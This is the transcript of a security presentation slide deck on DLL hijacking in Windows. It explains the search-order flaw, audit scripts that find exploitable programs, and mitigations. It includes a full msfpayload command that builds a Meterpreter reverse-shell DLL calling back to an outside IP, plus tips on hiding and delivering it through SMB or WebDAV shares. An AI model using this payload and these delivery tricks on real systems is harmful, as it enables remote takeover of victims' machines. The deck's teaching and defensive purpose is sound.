Dll hijacking
-
Upload
antitree -
Category
Technology
-
view
1.821 -
download
3
description
Transcript of Dll hijacking
How To Become a Hijacking Terrorist
DLL Hijacking for fun and profit
DLL Hijacking Overview
DLL Hijacking: Trick a program to use a malicious DLL instead of the normal DLL
HDM found that when opening a file associated to a program, the file will look in the local path for the referenced DLLs of the program before looking inside the correct location of the associated executable
PCAP Example - Normal
PCAP Example - Hijacked
DLL Hijacking
Old trick – new dog Linux removed “.” from $PATH Client side, WebDAV, or remote SMB
share Widely exploitable Easy to detect
DLLHijackAuditKit
Automates the detection Generates test scenarios for each file
extension and automatically creates an exploitable file
Searches every extension
Demo
Audit.js
Download procmon from sysinternals Opens procmon and filters for operations that begins with
"IRP_MJ_" or "FASTIO_". Use WMI to query the local system and file all the possible
file extensions it can handle Generate test cases for each file scenario. Make a dummy
file with the word “Howdy…” in it named after the extension being tested
Automatically open each file from command line While opening, log file system activity in procmon Wait a few seconds and then close out the program and try
the next file When you get all done, you need to save the procmon file as
LogFile.csv. This logfile will have the executable related to the file that was opened and also the path that it tried to look for a DLL.
Analyze.js
Parses the LogFile.csv for the executable and the DLL that it was looking for (wireshark.exe and airpcap.dll)
Generate test scenarios and copy in a dummy DLL named after the real DLL it’s looking for.
run the file again if it is successful, the DLL will create a txt
file named exploit.txt Repeat this step for each EXE and DLL pair
to verify which are actively exploitable
Real World Attack Scenario Generate Payload:
msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll
Rename to the DLL that the EXE is looking for
Put the DLL in the same folder as a file with an associated extension
Deliver file and DLL
Tricks
Use the Hidden attribute Obfuscate with lots of other files MSFEncode the payload Create a link to a subfolder Road Apples Host a SMB share on the net! Create a WebDAV share
Mitigation
Admins: Microsoft tool to catch illegal DLL
references http://support.microsoft.com/kb/2264107 CWDIllegalInDllSearch registry
Disable WebDAV Disable outbound SMB (139 445)Developers: Load DLL’s securely
References
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://blog.metasploit.com/2010/08/better-faster-stronger.html
0day (AFAIK)
RDP .dll